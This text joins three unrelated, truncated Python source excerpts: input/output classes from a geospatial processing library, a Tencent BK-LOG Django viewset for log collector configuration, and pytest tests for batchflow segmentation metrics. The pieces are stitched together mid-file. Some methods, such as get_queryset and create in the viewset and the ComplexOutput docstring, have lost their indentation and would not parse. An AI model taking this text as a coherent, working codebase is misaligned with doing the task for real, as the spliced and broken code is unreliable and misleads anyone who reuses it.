        """
        :param mime_type: given mimetype
        :return: Format matching *mime_type*, or None when unsupported
        """
        for frmt in self.supported_formats:
            if frmt.mime_type == mime_type:
                return frmt
        else:
            # Loop fell through: no supported format carries this mimetype.
            return None
    @property
    def validator(self):
        """Return the proper validator for given data_format
        """
        return self.data_format.validate
    @property
    def supported_formats(self):
        return self._supported_formats
    @supported_formats.setter
    def supported_formats(self, supported_formats):
        """Setter of supported formats
        """
        # Ensure every format carries a usable validator: formats without
        # one (or with the emptyvalidator placeholder) get one resolved
        # from their mimetype.
        def set_format_validator(supported_format):
            if not supported_format.validate or \
               supported_format.validate == emptyvalidator:
                supported_format.validate =\
                    get_validator(supported_format.mime_type)
            return supported_format
        self._supported_formats = tuple(map(set_format_validator, supported_formats))
    @property
    def data_format(self):
        return self._data_format
    @data_format.setter
    def data_format(self, data_format):
        """self data_format setter

        :raises InvalidParameterValue: when the format is not supported
        """
        if self._is_supported(data_format):
            self._data_format = data_format
            if not data_format.validate or data_format.validate == emptyvalidator:
                data_format.validate = get_validator(data_format.mime_type)
        else:
            raise InvalidParameterValue("Requested format {}, {}, {} not supported".format(
                                        data_format.mime_type,
                                        data_format.encoding,
                                        data_format.schema),
                                        'mimeType')
    def _is_supported(self, data_format):
        # A format is supported when it matches any declared format.
        if self.supported_formats:
            for frmt in self.supported_formats:
                if frmt.same_as(data_format):
                    return True
        return False
class BasicBoundingBox(object):
    """Basic BoundingBox input/output class

    Keeps the list of supported CRSs (defaulting to epsg:4326), the
    currently selected CRS and the number of dimensions.
    """
    def __init__(self, crss=None, dimensions=2):
        if crss:
            self.crss = crss
        else:
            self.crss = ['epsg:4326']
        self.crs = self.crss[0]
        self.dimensions = dimensions
    @property
    def ll(self):
        """Lower-left corner, or an empty list when no data is set."""
        coords = getattr(self, 'data', None)
        return coords[:2] if coords else []
    @property
    def ur(self):
        """Upper-right corner, or an empty list when no data is set."""
        coords = getattr(self, 'data', None)
        return coords[2:] if coords else []
class LiteralInput(BasicIO, BasicLiteral, SimpleHandler):
    """LiteralInput input abstract class

    Combines common IO metadata (BasicIO), literal typing (BasicLiteral)
    and literal data handling (SimpleHandler).
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None,
                 data_type="integer", workdir=None, allowed_values=None,
                 uoms=None, mode=MODE.NONE,
                 min_occurs=1, max_occurs=1, metadata=None,
                 default=None, default_type=SOURCE_TYPE.DATA):
        # Fix the shared mutable-default pitfall ([] default aliased
        # across instances).
        if metadata is None:
            metadata = []
        BasicIO.__init__(self, identifier, title, abstract, keywords,
                         min_occurs, max_occurs, metadata)
        BasicLiteral.__init__(self, data_type, uoms)
        SimpleHandler.__init__(self, workdir, data_type, mode=mode)
        if default_type != SOURCE_TYPE.DATA:
            raise InvalidParameterValue("Source types other than data are not supported.")
        self.any_value = False
        self.values_reference = None
        self.allowed_values = []
        if allowed_values:
            if not isinstance(allowed_values, (tuple, list)):
                allowed_values = [allowed_values]
            # AnyValue wins over everything; the first values reference
            # found wins over explicit allowed values (see validator).
            self.any_value = any(is_anyvalue(a) for a in allowed_values)
            for value in allowed_values:
                if is_values_reference(value):
                    self.values_reference = value
                    break
            self.allowed_values = make_allowedvalues(allowed_values)
        self._default = default
        self._default_type = default_type
        if default is not None:
            self.data = default
    @property
    def validator(self):
        """Get validator for any value as well as allowed_values

        :rtype: function
        """
        if self.any_value:
            return validate_anyvalue
        elif self.values_reference:
            return validate_values_reference
        elif self.allowed_values:
            return validate_allowed_values
        else:
            return validate_value
class LiteralOutput(BasicIO, BasicLiteral, SimpleHandler):
    """Basic LiteralOutput class
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None,
                 data_type=None, workdir=None, uoms=None, validate=None,
                 mode=MODE.NONE):
        BasicIO.__init__(self, identifier, title, abstract, keywords)
        BasicLiteral.__init__(self, data_type, uoms)
        # Fix: forward the caller's workdir instead of hard-coding None,
        # which silently discarded the argument.
        SimpleHandler.__init__(self, workdir=workdir, data_type=data_type,
                               mode=mode)
        # NOTE(review): the `validate` parameter is accepted but unused;
        # kept for interface compatibility -- confirm whether it should
        # feed the validator.
        self._storage = None
    @property
    def storage(self):
        """Storage backend used to persist this output (set externally)."""
        return self._storage
    @storage.setter
    def storage(self, storage):
        self._storage = storage
    @property
    def validator(self):
        """Get validator for any value as well as allowed_values
        """
        return validate_anyvalue
class BBoxInput(BasicIO, BasicBoundingBox, DataHandler):
    """Basic Bounding box input abstract class
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None, crss=None,
                 dimensions=None, workdir=None,
                 mode=MODE.SIMPLE,
                 min_occurs=1, max_occurs=1, metadata=None,
                 default=None, default_type=SOURCE_TYPE.DATA):
        # Fix the shared mutable-default pitfall: [] defaults would be
        # aliased across all instances.
        if keywords is None:
            keywords = []
        if metadata is None:
            metadata = []
        BasicIO.__init__(self, identifier, title, abstract, keywords,
                         min_occurs, max_occurs, metadata)
        BasicBoundingBox.__init__(self, crss, dimensions)
        DataHandler.__init__(self, workdir=workdir, mode=mode)
        if default_type != SOURCE_TYPE.DATA:
            raise InvalidParameterValue("Source types other than data are not supported.")
        self._default = default
        self._default_type = default_type
        self._set_default_value(default, default_type)
class BBoxOutput(BasicIO, BasicBoundingBox, DataHandler):
    """Basic BoundingBox output class
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None, crss=None,
                 dimensions=None, workdir=None, mode=MODE.NONE):
        BasicIO.__init__(self, identifier, title, abstract, keywords)
        BasicBoundingBox.__init__(self, crss, dimensions)
        DataHandler.__init__(self, workdir=workdir, mode=mode)
        # Storage backend is attached later via the `storage` property.
        self._storage = None
    @property
    def storage(self):
        """Storage backend used to persist this output."""
        return self._storage
    @storage.setter
    def storage(self, storage):
        self._storage = storage
class ComplexInput(BasicIO, BasicComplex, IOHandler):
    """Complex input abstract class

    Dispatches an incoming input to the matching source handler:
    inline data, a file:// reference, or a remote URL reference.
    (The previous doctest was removed: it constructed ComplexInput()
    without the required identifier and assigned to the read-only
    `validator` property.)
    """
    def __init__(self, identifier, title=None, abstract=None, keywords=None,
                 workdir=None, data_format=None, supported_formats=None,
                 mode=MODE.NONE,
                 min_occurs=1, max_occurs=1, metadata=None,
                 default=None, default_type=SOURCE_TYPE.DATA):
        # Fix the shared mutable-default pitfall ([] default aliased
        # across instances).
        if metadata is None:
            metadata = []
        BasicIO.__init__(self, identifier, title, abstract, keywords,
                         min_occurs, max_occurs, metadata)
        IOHandler.__init__(self, workdir=workdir, mode=mode)
        BasicComplex.__init__(self, data_format, supported_formats)
        self._default = default
        self._default_type = default_type
    def file_handler(self, inpt):
        """<wps:Reference /> handler.
        Used when href is a file url."""
        extend_instance(self, FileHandler)
        # check if file url is allowed
        self._validate_file_input(href=inpt.get('href'))
        # save the file reference input in workdir
        tmp_file = self._build_file_name(href=inpt.get('href'))
        try:
            inpt_file = urlparse(inpt.get('href')).path
            inpt_file = os.path.abspath(inpt_file)
            os.symlink(inpt_file, tmp_file)
            LOGGER.debug("Linked input file {} to {}.".format(inpt_file, tmp_file))
        except Exception:
            # TODO: handle os.symlink on windows
            # raise NoApplicableCode("Could not link file reference: {}".format(e))
            # Fall back to copying when symlinking fails (e.g. Windows).
            # Fix: Logger.warn is deprecated in favour of Logger.warning.
            LOGGER.warning("Could not link file reference")
            shutil.copy2(inpt_file, tmp_file)
        return tmp_file
    def url_handler(self, inpt):
        """<wps:Reference /> handler for remote URLs.

        Only resolves any POST payload; no download happens here.
        """
        # That could possibly go into the data property...
        if inpt.get('method') == 'POST':
            if 'body' in inpt:
                self.post_data = inpt.get('body')
            elif 'bodyreference' in inpt:
                self.post_data = requests.get(url=inpt.get('bodyreference')).text
            else:
                raise AttributeError("Missing post data content.")
        return inpt.get('href')
    def process(self, inpt):
        """Subclass with the appropriate handler given the data input."""
        href = inpt.get('href', None)
        self.inpt = inpt
        if href:
            if urlparse(href).scheme == 'file':
                self.file = self.file_handler(inpt)
            else:
                # No file download occurs here. The file content will
                # only be retrieved when the file property is accessed.
                self.url = self.url_handler(inpt)
        else:
            self.data = inpt.get('data')
    @staticmethod
    def _validate_file_input(href):
        """Accept only file:// URLs under the configured allowed paths.

        :raises FileURLNotSupported: for any other scheme, an empty path,
            or a path outside ``server.allowedinputpaths``
        """
        href = href or ''
        parsed_url = urlparse(href)
        if parsed_url.scheme != 'file':
            raise FileURLNotSupported('Invalid URL scheme')
        file_path = parsed_url.path
        if not file_path:
            raise FileURLNotSupported('Invalid URL path')
        file_path = os.path.abspath(file_path)
        # build allowed paths list
        inputpaths = config.get_config_value('server', 'allowedinputpaths')
        allowed_paths = [os.path.abspath(p.strip()) for p in inputpaths.split(':') if p.strip()]
        for allowed_path in allowed_paths:
            if file_path.startswith(allowed_path):
                LOGGER.debug("Accepted file url as input.")
                return
        raise FileURLNotSupported()
class ComplexOutput(BasicIO, BasicComplex, IOHandler):
"""Complex output abstract class
>>> # temporary configuration
>>> import | |
# -*- coding: utf-8 -*-
"""
Tencent is pleased to support the open source community by making BK-LOG 蓝鲸日志平台 available.
Copyright (C) 2021 THL A29 Limited, a Tencent company. All rights reserved.
BK-LOG 蓝鲸日志平台 is licensed under the MIT License.
License for BK-LOG 蓝鲸日志平台:
--------------------------------------------------------------------
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated
documentation files (the "Software"), to deal in the Software without restriction, including without limitation
the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial
portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT
LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN
NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE
SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from rest_framework import serializers
from django.db.models import Q
from rest_framework.response import Response
from apps.exceptions import ValidationError
from apps.log_databus.constants import EtlConfig
from apps.log_search.constants import HAVE_DATA_ID, BKDATA_OPEN, NOT_CUSTOM, CollectorScenarioEnum
from apps.log_search.permission import Permission
from apps.utils.drf import detail_route, list_route
from apps.generic import ModelViewSet
from apps.iam import ActionEnum, ResourceEnum
from apps.iam.handlers.drf import (
InstanceActionPermission,
ViewBusinessPermission,
BusinessActionPermission,
insert_permission_field,
)
from apps.log_databus.handlers.collector import CollectorHandler
from apps.log_databus.handlers.etl import EtlHandler
from apps.log_databus.handlers.link import DataLinkHandler
from apps.log_databus.models import CollectorConfig
from apps.log_databus.serializers import (
RunSubscriptionSerializer,
BatchSubscriptionStatusSerializer,
TaskStatusSerializer,
TaskDetailSerializer,
CollectorListSerializer,
RetrySerializer,
CollectorEtlSerializer,
CollectorEtlStorageSerializer,
CollectorCreateSerializer,
CollectorUpdateSerializer,
CollectorEtlTimeSerializer,
CollectorDataLinkListSerializer,
CollectorRegexDebugSerializer,
ListCollectorsByHostSerializer,
CleanStashSerializer,
ListCollectorSerlalizer,
CustomCreateSerializer,
CustomUpateSerializer,
)
from apps.utils.function import ignored
class CollectorViewSet(ModelViewSet):
    """
    Collector configuration management (采集项).
    """
    # URL kwarg used to look up a single collector config.
    lookup_field = "collector_config_id"
    # Excluded from the automatically generated filter fields.
    filter_fields_exclude = ["collector_config_overlay"]
    model = CollectorConfig
    search_fields = ("collector_config_name", "table_id", "bk_biz_id")
    ordering_fields = ("updated_at", "updated_by")
    def get_permissions(self):
        """Resolve the DRF permission classes for the current action."""
        with ignored(Exception, log_exception=True):
            auth_info = Permission.get_auth_info(self.request)
            # Apps on the ESQUERY white list bypass permission checks.
            if auth_info["bk_app_code"] in settings.ESQUERY_WHITE_LIST:
                return []
        # Publicly accessible actions.
        if self.action in ["list_scenarios", "batch_subscription_status"]:
            return []
        # Creating collectors needs the business-level create permission.
        if self.action in ["create", "only_create", "custom_create"]:
            return [BusinessActionPermission([ActionEnum.CREATE_COLLECTION])]
        # Read-only actions on a single collector instance.
        if self.action in [
            "indices_info",
            "retrieve",
            "task_status",
            "task_detail",
            "subscription_status",
            "get_data_link_list",
        ]:
            return [InstanceActionPermission([ActionEnum.VIEW_COLLECTION], ResourceEnum.COLLECTION)]
        # Mutating actions on a single collector instance.
        if self.action in [
            "update",
            "only_update",
            "destroy",
            "retry",
            "tail",
            "start",
            "stop",
            "etl_preview",
            "etl_time",
            "update_or_create_clean_config",
            "custom_update",
        ]:
            return [InstanceActionPermission([ActionEnum.MANAGE_COLLECTION], ResourceEnum.COLLECTION)]
        return [ViewBusinessPermission()]
def get_queryset(self):
qs = self.model.objects
if self.request.query_params.get(HAVE_DATA_ID):
qs = qs.filter(bk_data_id__isnull=False)
if self.request.query_params.get(BKDATA_OPEN) and settings.FEATURE_TOGGLE["scenario_bkdata"] == "off":
qs = qs.filter(Q(etl_config=EtlConfig.BK_LOG_TEXT) | Q(etl_config__isnull=True))
if self.request.query_params.get(NOT_CUSTOM):
qs = qs.exclude(collector_scenario_id=CollectorScenarioEnum.CUSTOM.value)
return qs.all()
    def get_serializer_class(self, *args, **kwargs):
        """Pick the request serializer matching the current action.

        Actions without an entry fall back to the permissive base
        Serializer and validate their own parameters.
        """
        action_serializer_map = {
            "subscription_run": RunSubscriptionSerializer,
            "batch_subscription_status": BatchSubscriptionStatusSerializer,
            "task_status": TaskStatusSerializer,
            "task_detail": TaskDetailSerializer,
            "list": CollectorListSerializer,
            "retry": RetrySerializer,
            "list_collectors": CollectorListSerializer,
        }
        return action_serializer_map.get(self.action, serializers.Serializer)
    @list_route(methods=["GET"], url_path="scenarios")
    def list_scenarios(self, request, *args, **kwargs):
        """
        @api {get} /databus/collector/scenarios/ 01_Collector scenarios
        @apiName list_collector_scenarios
        @apiGroup 10_Collector
        @apiDescription Show the collector scenarios and the custom configuration each of them supports
        @apiSuccess {Int} collector_scenario_id collector scenario ID
        @apiSuccess {String} collector_scenario_name collector scenario name
        @apiSuccess {Bool} is_active whether the scenario is available (inactive ones are shown by the frontend but cannot be selected)
        @apiSuccess {Json} config scenario configuration (matches the params used for collector creation)
        @apiSuccess {String} config.field_type field type
        @apiSuccess {String} config.field_name field name
        @apiSuccess {String} config.field_alias field alias
        @apiSuccess {Bool} config.required whether the field is required
        @apiSuccess {Json} config.option extra field options
        @apiSuccess {List} config.conditions.option.choices supported choices
        @apiSuccessExample {json} Success response:
        {
            "message": "",
            "code": 0,
            "data": [
                {
                    "collector_scenario_id": "row",
                    "collector_scenario_name": "行日志",
                    "is_active": true,
                    "config": {
                        "paths": {
                            "field_type": "list",
                            "field_name": "paths",
                            "field_alias": "日志路径",
                            "required": true,
                            "option": {}
                        },
                        "conditions": {
                            "field_type": "dict",
                            "field_name": "conditions",
                            "field_alias": "过滤方式",
                            "required": false,
                            "option": {
                                "choices": ["match", "separator"]
                            }
                        }
                    }
                }
            ],
            "result": true
        }
        """
        # Static catalogue of the supported scenarios; "section" logs are
        # declared but flagged inactive.
        scenarios = [
            {
                "collector_scenario_id": "row",
                "collector_scenario_name": _("行日志"),
                "is_active": True,
                "config": {
                    "paths": {
                        "field_type": "list",
                        "field_name": "paths",
                        "field_alias": _("日志路径"),
                        "required": True,
                        "option": {},
                    },
                    "conditions": {
                        "field_type": "dict",
                        "field_name": "conditions",
                        "field_alias": _("过滤方式"),
                        "required": False,
                        "option": {"choices": ["match", "separator"]},
                    },
                },
            },
            {
                "collector_scenario_id": "section",
                "collector_scenario_name": _("段日志"),
                "is_active": False,
                "config": {
                    "paths": {
                        "field_type": "list",
                        "field_name": "paths",
                        "field_alias": _("日志路径"),
                        "required": True,
                        "option": {},
                    },
                    "conditions": {
                        "field_type": "dict",
                        "field_name": "conditions",
                        "field_alias": _("过滤方式"),
                        "required": False,
                        "option": {"choices": ["match"]},
                    },
                },
            },
        ]
        return Response(scenarios)
    @insert_permission_field(
        id_field=lambda d: d["collector_config_id"],
        data_field=lambda d: d["list"],
        actions=[ActionEnum.VIEW_COLLECTION, ActionEnum.MANAGE_COLLECTION],
        resource_meta=ResourceEnum.COLLECTION,
    )
    @insert_permission_field(
        id_field=lambda d: d["index_set_id"],
        data_field=lambda d: d["list"],
        actions=[ActionEnum.SEARCH_LOG],
        resource_meta=ResourceEnum.INDICES,
    )
    def list(self, request, *args, **kwargs):
        """
        @api {get} /databus/collectors/?page=$page&pagesize=$pagesize&keyword=$keyword&bk_biz_id=$bk_biz_id 11_Collector list
        @apiName list_collector
        @apiGroup 10_Collector
        @apiDescription Collector list; the running status is fetched separately through an async endpoint
        @apiParam {Int} bk_biz_id business ID
        @apiParam {Int} page page number
        @apiParam {Int} pagesize page size
        @apiParam {String} keyword search keyword
        @apiSuccess {Int} count total count
        @apiSuccess {Int} total_page total number of pages
        @apiSuccess {Array} results result list
        @apiSuccess {Int} results.collector_config_id collector config ID
        @apiSuccess {Int} results.collector_config_name collector config name
        @apiSuccess {String} results.collector_scenario_id scenario id
        @apiSuccess {String} results.collector_scenario_name scenario name
        @apiSuccess {String} results.category_id category ID
        @apiSuccess {String} results.category_name category name
        @apiSuccess {Bool} results.is_active whether the collector is active
        @apiSuccess {String} results.description description
        @apiSuccess {String} results.created_by creator
        @apiSuccess {String} results.created_at creation time
        @apiSuccessExample {json} Success response:
        {
            "message": "",
            "code": 0,
            "data": {
                "count": 10,
                "total_page": 1,
                "results": [{
                    "collector_config_id": 1,
                    "collector_config_name": "采集项名称",
                    "collector_scenario_id": "line",
                    "collector_scenario_name": "行日志",
                    "category_id": "host_os",
                    "category_name": "主机-操作系统",
                    "is_active": true,
                    "created_by": "小星星",
                    "created_at": "2019-06-12 12:00:00"
                }]
            },
            "result": true
        }
        """
        # Pagination parameters are mandatory for this endpoint.
        if not request.GET.get("page") or not request.GET.get("pagesize"):
            raise ValidationError(_("分页参数不能为空"))
        response = super().list(request, *args, **kwargs)
        # Enrich every row with its storage-cluster information.
        response.data["list"] = CollectorHandler.add_cluster_info(response.data["list"])
        return response
    @insert_permission_field(
        id_field=lambda d: d["collector_config_id"],
        data_field=lambda d: d["list"],
        actions=[ActionEnum.MANAGE_COLLECTION],
        resource_meta=ResourceEnum.COLLECTION,
    )
    @list_route(methods=["GET"])
    def list_collector(self, request):
        """
        @api {get} /databus/collectors/list_collector?bk_biz_id=$bk_biz_id Collector dropdown list
        @apiName list_collector_switch
        @apiGroup 10_Collector
        @apiDescription Collector dropdown list
        @apiParam {Int} bk_biz_id business ID
        @apiSuccessExample {json} Success response:
        {
            "message": "",
            "code": 0,
            "data": {
                "collector_config_id": 1,
                "collector_config_name": "采集项名称",
            },
            "result": true
        }
        """
        # Validate the query params with the dedicated serializer, then
        # delegate to the handler.
        data = self.params_valid(ListCollectorSerlalizer)
        return Response(CollectorHandler().list_collector(data["bk_biz_id"]))
    def retrieve(self, request, *args, collector_config_id=None, **kwargs):
        """
        @api {get} /databus/collectors/$collector_config_id/ 12_Collector detail
        @apiName retrieve_collector
        @apiGroup 10_Collector
        @apiParam {Int} collector_config_id collector config ID
        @apiSuccess {String} collector_scenario_id log type, one of `row, section, win_event`
        @apiSuccess {String} collector_scenario_name log type name
        @apiSuccess {String} collector_config_name collector config name
        @apiSuccess {String} category_id data category
        @apiSuccess {String} category_name data category display name
        @apiSuccess {Array[Dict]} target selected targets
        @apiSuccess {Array(json)} target_nodes collection targets
        @apiSuccess {Int} target_nodes.id service instance id
        @apiSuccess {Int} target_nodes.bk_inst_id node instance id
        @apiSuccess {String} target_nodes.bk_obj_id node object id
        @apiSuccess {String} target_nodes.ip host instance ip
        @apiSuccess {Int} target_nodes.bk_cloud_id BlueKing cloud host id
        @apiSuccess {Int} target_nodes.bk_supplier_id supplier id
        @apiSuccess {String} data_encoding log charset
        @apiSuccess {String} bk_data_id META collector data id
        @apiSuccess {String} bk_data_name META collector data name
        @apiSuccess {String} description description
        @apiSuccess {json} params log collection params
        @apiSuccess {Array} params.paths log paths
        @apiSuccess {json} params.conditions filter settings
        @apiSuccess {String} params.conditions.type filter type, one of `match, separator`
        @apiSuccess {String} params.conditions.match_type match type, one of `include, exclude`
        @apiSuccess {String} params.conditions.match_content match content
        @apiSuccess {String} params.conditions.separator separator
        @apiSuccess {Json} params.conditions.separator_filters separator filter conditions
        @apiSuccess {String} etl_config field extraction method
        @apiSuccess {Object} etl_params field extraction params
        @apiSuccess {String} etl_params.separator separator
        @apiSuccess {String} etl_params.separator_regexp field extraction regex
        @apiSuccess {Bool} etl_params.retain_original_text whether the original text is kept
        @apiSuccess {list} fields field list
        @apiSuccess {Int} fields.field_index field order (shown for separator mode)
        @apiSuccess {String} fields.field_name field name
        @apiSuccess {String} [fields.alias_name] field alias
        @apiSuccess {String} fields.field_type field type
        @apiSuccess {String} fields.description field description
        @apiSuccess {Bool} fields.is_analyzed whether the field is analyzed
        @apiSuccess {Bool} fields.is_dimension whether the field is a dimension
        @apiSuccess {Bool} fields.is_time whether the field is the time field
        @apiSuccess {Bool} fields.is_built_in whether the field is built in
        @apiSuccess {Bool} fields.is_delete whether the field is deleted
        @apiSuccess {Json} [fields.option] field options
        @apiSuccess {Int} fields.option.time_zone time zone
        @apiSuccess {String} fields.option.time_format time format
        @apiSuccess {Int} storage_cluster_id storage cluster ID
        @apiSuccess {String} storage_cluster_name storage cluster name
        @apiSuccess {Int} retention retention days
        @apiSuccess {String} table_id_prefix storage index (table id) prefix
        @apiSuccess {String} table_id storage index (table id) name
        @apiSuccess {String} created_at creation time
        @apiSuccess {String} created_by creator
        @apiSuccess {String} updated_at update time
        @apiSuccess {String} updated_by updater
        @apiSuccess {String} itsm_ticket_status ITSM ticket status
        @apiSuccess {String} itsm_ticket_status_display ITSM ticket status display name
        @apiSuccess {String} ticket_url ITSM ticket URL
        @apiSuccess {String} index_split_rule index split rule
        @apiSuccessExample {json} Success response:
        {
            "collector_scenario_id": "row",
            "collector_scenario_name": "行日志",
            "collector_config_name": "我叫access的",
            "category_id": "os",
            "category_name": "主机-操作系统",
            "target_nodes": [
                {
                   "id": 12
                },
                {
                    "bk_inst_id": 33,
                    "bk_obj_id": "module",
                },
                {
                    "ip": "127.0.0.1",
                    "bk_cloud_id": 0,
                    "bk_supplier_id": 0,
                }
            ],
            "data_encoding": "utf-8",
            "bk_data_name": "存储索引名",
            "description": "这是一个描述",
            "params": {
                "paths": ["/tmp/health_check.log"],
                "conditions": {
                    "type": "match",
                    "match_type": "include",
                    "match_content": "delete",
                    "separator": "|",
                    "separator_filters": [
                        {
                            "fieldindex": 2,
                            "word": "32",
                            "op": "="
                        }
                    ]
                }
            },
            "etl_config": "bk_log_text",
            "etl_params": {
                "separator_regexp": "[a-z][0-9]",
                "separator": "|",
                "retain_original_text": true
            },
            "fields": [
                {
                    "field_index": 1,
                    "field_name": "user",
                    "alias_name": "",
                    "field_type": "string",
                    "description": "字段描述",
                    "is_analyzed": true,
                    "is_dimension": false,
                    "is_time": false,
                    "is_built_in": false,
                    "is_delete": false,
                },
                {
                    "field_index": 2,
                    "field_name": "",
                    "alias_name": "",
                    "field_type": "string",
                    "description": "",
                    "is_analyzed": true,
                    "is_dimension": false,
                    "is_time": false,
                    "is_built_in": false,
                    "is_delete": true,
                },
                {
                    "field_index": 3,
                    "field_name": "report_time",
                    "alias_name": "",
                    "field_type": "string",
                    "description": "字段描述",
                    "is_analyzed": false,
                    "is_dimension": true,
                    "is_time": true,
                    "is_built_in": false,
                    "is_delete": false,
                    "option": {
                        "time_zone": 8,
                        "time_format": "yyyy-MM-dd HH:mm:ss"
                    }
                }
            ],
            "table_id_prefix": "2_bklog_",
            "table_id": "search",
            "storage_cluster_id": 3,
            "storage_cluster_name": "存储集群名称",
            "retention": 1,
            "itsm_ticket_status": "success_apply",
            "itsm_ticket_status_display": "采集接入完成",
            "ticket_url": "",
            "index_split_rule": ""
        }
        """
        # Delegate entirely to the collector handler.
        return Response(CollectorHandler(collector_config_id=collector_config_id).retrieve())
def create(self, request, *args, **kwargs):
"""
@api {post} /databus/collectors/ 13_采集项-创建
@apiName create_collector
@apiDescription 创建采集项
| |
"""Test SegmentationMetricsByPixels and SegmentationMetricsByInstances classes.
Also act as tests for ClassificationMetrics, since it's identical to
SegmentationMetricsByPixels.
Structurally, file consists of four classes, which respectively check:
- basic assembly process (shapes compatibility, confusion matrix corectness);
- evaluated result shape of SegmemtationMetricsByPixels for all metrics;
- similarly, evaluated result contents;
- so-called "subsampling" functions of SegmentationMetricsByInstances.
Test data is pre-defined, it's shape and contents were chosen for reasons
of balance between visual simplicity and test coverage diversity.
"""
# pylint: disable=import-error, no-name-in-module, invalid-name, protected-access
import numpy as np
import pytest
from batchflow.models.metrics import SegmentationMetricsByPixels, SegmentationMetricsByInstances
# Accuracy is not included because it can't process 'multiclass' parameter
# and therefore is being tested individually.
METRICS_LIST = ['tpr', 'fpr', 'fnr', 'tnr', 'prv', 'ppv', 'fdr', 'for', 'npv', 'plr', 'nlr', 'dor', 'f1s', 'jac']
BATCH_SIZE = 4
IMAGE_SIZE = 2
NUM_CLASSES = 3
# Set targets.
# Shape: (BATCH_SIZE, IMAGE_SIZE, IMAGE_SIZE) with class labels 0..NUM_CLASSES-1.
TARGETS = np.array([[[0, 1],
                     [2, 2]],
                    [[0, 0],
                     [1, 1]],
                    [[0, 1],
                     [0, 2]],
                    [[0, 0],
                     [1, 1]]
                    ])
# Set predictions as 'labels'.
LABELS = np.array([[[0, 1],
                    [1, 0]],
                   [[2, 0],
                    [1, 1]],
                   [[0, 1],
                    [2, 1]],
                   [[0, 0],
                    [0, 1]]
                   ])
# Onehots are basically like probas, just with all 0 and a single 1.
PROBA = np.eye(NUM_CLASSES)[LABELS]
# Logit function gives ±infs on degenerate case of 0s and 1s but works fine for sigmoid function.
LOGITS = np.where(PROBA > 0.5, np.inf, -np.inf)
"""First param stands for predictions variable, second — for predictions type, third — for axis with class info.
Transposed predictions correspond to 'channels_first' data format."""
PREDICTIONS = [(LABELS, 'labels', None),
               (PROBA, 'proba', 3),
               (LOGITS, 'logits', 3),
               (np.transpose(PROBA, (3, 0, 1, 2)), 'proba', 0),
               (np.transpose(LOGITS, (3, 0, 1, 2)), 'logits', 0)]
# Malformed inputs used to check error handling at assembly time.
BAD_PREDICTIONS = [(LABELS[0], 'labels', None),  # predictions ndim is less then targets' for labels
                   (PROBA, 'proba', None),  # axis is None for multiclass proba
                   (LOGITS, 'logits', None)]  # axis is None for multiclass logits
class TestAssembly:
    """Check metrics creation process."""
    @pytest.mark.parametrize('SegmentationMetrics', [SegmentationMetricsByPixels, SegmentationMetricsByInstances])
    @pytest.mark.parametrize('predictions, fmt, axis', BAD_PREDICTIONS)
    def test_incompatibility_processing(self, SegmentationMetrics, predictions, fmt, axis):
        """Create metrics class with inconsistent targets and predictions
        (different ndim, no axis when it's required), expecting ValueError.
        Parameters
        ----------
        SegmentationMetrics: SegmentationsMetricsByPixels or
        SegmentationsMetricsByInstances
            Metrics class
        predictions : np.array
            Variable name containing predictions' array of desired format
        fmt : string
            Denotes predictions format
        axis : None or int
            A class axis
        """
        with pytest.raises(ValueError):
            SegmentationMetrics(TARGETS, predictions, fmt, NUM_CLASSES, axis)
    # Expected confusion matrices for the fixed TARGETS/LABELS pair:
    # a (4, 3, 3) per-batch-item class matrix for the by-pixels metric and
    # a (4, 2, 2, 2) matrix for the by-instances metric.
    params = [(SegmentationMetricsByPixels, np.array([[[1, 0, 1],
                                                       [0, 1, 1],
                                                       [0, 0, 0]],
                                                      [[1, 0, 0],
                                                       [0, 2, 0],
                                                       [1, 0, 0]],
                                                      [[1, 0, 0],
                                                       [0, 1, 1],
                                                       [1, 0, 0]],
                                                      [[2, 1, 0],
                                                       [0, 1, 0],
                                                       [0, 0, 0]]]),
               ),
              (SegmentationMetricsByInstances, np.array([[[[0, 0],
                                                           [1, 1]],
                                                          [[0, 1],
                                                           [0, 0]]],
                                                         [[[0, 0],
                                                           [0, 1]],
                                                          [[0, 0],
                                                           [1, 0]]],
                                                         [[[0, 0],
                                                           [0, 1]],
                                                          [[0, 1],
                                                           [1, 0]]],
                                                         [[[0, 0],
                                                           [0, 1]],
                                                          [[0, 0],
                                                           [0, 0]]],
                                                         ]))]
    @pytest.mark.parametrize('SegmentationMetrics, exp_matrix', params)
    @pytest.mark.parametrize('predictions, fmt, axis', PREDICTIONS)
    def test_confusion_matrix(self, SegmentationMetrics, exp_matrix, predictions, fmt, axis):
        """Compare contents of actual confusion matrix with expected ones
        for metrics class assembled with given params.
        Parameters
        ----------
        SegmentationMetrics: SegmentationsMetricsByPixels or
        SegmentationsMetricsByInstances
            Metrics class
        exp_matrix: np.array
            Expected confusion matrix
        predictions : np.array
            Variable name containing predictions' array of desired format
        fmt : string
            Denotes predictions format
        axis : None or int
            A class axis
        """
        metric = SegmentationMetrics(TARGETS, predictions, fmt, NUM_CLASSES, axis)
        res_matrix = metric._confusion_matrix
        assert np.array_equal(res_matrix, exp_matrix)
class TestShape:
    """Check the shape of evaluated metrics return value for various parameters.

    There is a following pattern in both tests:
    0. Each function is preceded by data for its parametrization.
    1. Parametrizing decorators are applied.
    2. Instance of SegmentationMetricsByPixels is being created.
    3. Metric is being evaluated with given parameters.
    4. Its result's shape is being compared with expected one.
    """
    # First param stands for batch aggregation, second — for multiclass one, third represents expected output shape.
    # Shapes that depend on skip_bg are lambdas taking the bool (used as 0/1).
